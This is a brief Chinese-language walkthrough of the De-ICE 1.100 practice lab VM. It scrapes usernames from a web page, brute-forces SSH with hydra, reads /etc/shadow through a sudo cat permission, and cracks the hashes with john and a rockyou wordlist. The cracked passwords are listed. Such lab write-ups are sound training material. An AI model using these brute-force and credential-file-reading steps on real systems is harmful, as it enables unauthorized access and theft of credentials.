john and hydra using de-ice1.100

　　

配置IP  ipconfig etho 192.168.179.111

http://192.168.179.111/index2.php

curl http://192.168.179.111/index2.php |grep -E -o "[a-zA-Z0-9.-]+@"

curl http://192.168.179.111/index2.php |grep -E -o "[a-zA-Z0-9.-]+@" |cut -d "@" -f1

提取邮箱

curl http://192.168.179.111/index2.php |grep -E -o "[a-zA-Z0-9_-]+@[a-zA-Z0-9_-]+(.[a-zA-Z0-9_-]+)"

hydra破解密码

hydra -L /home/user.txt -P /home/unix_passwords.txt -t 5 ssh://192.168.179.111

user.txt的内容

princess
marym
patrickp
thompsont
benedictb
genniege
michaelp
elong
aadams
bbanter
ccoffee
nostradamus

bbanter@slax:~$ cat /etc/group
root::0:root
bin::1:root,bin,daemon
daemon::2:root,bin,daemon
sys::3:root,bin,adm
adm::4:root,adm,daemon
tty::5:
disk::6:root,adm
lp::7:lp
mem::8:
kmem::9:
wheel::10:root

aadams:x:1000:10:,,,:/home/aadams:/bin/bash
bbanter:x:1001:100:,,,:/home/bbanter:/bin/bash
ccoffee:x:1002:100:,,,:/home/ccoffee:/bin/bash

aadams在wheel组下，wheel类似于一个管理员的组。

使用sudo -l

aadams@slax:~$ sudo -l

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

Password:
User aadams may run the following commands on this host:
    (root) NOEXEC: /bin/ls
    (root) NOEXEC: /usr/bin/cat
    (root) NOEXEC: /usr/bin/more
    (root) NOEXEC: !/usr/bin/su *root*

使用sudo 执行cat命令
aadams@slax:~$ sudo cat /etc/shadow
Password:
root:$1$TOi0HE5n$j3obHaAlUdMbHQnJ4Y5Dq0:13553:0:::::
bin:*:9797:0:::::
daemon:*:9797:0:::::
adm:*:9797:0:::::
lp:*:9797:0:::::
sync:*:9797:0:::::


使用john破解shadow密码
john --format=aix-smd5 --wordlist=/home/rockyou.txt mm.txt 
结果如下

root:tarot:13553:0:::::
aadams:nostradamus:13550:0:99999:7:::
bbanter:bbanter:13550:0:99999:7:::
ccoffee:hierophant:13550:0:99999:7:::
在用root登陆的过程中发现root不允许远程登陆
可以使用普通用户登陆后，su到root上。

rockyou.txt下载地址：
https://pan.baidu.com/s/1hfnY4bkZ9UABbQ_kdjRUfw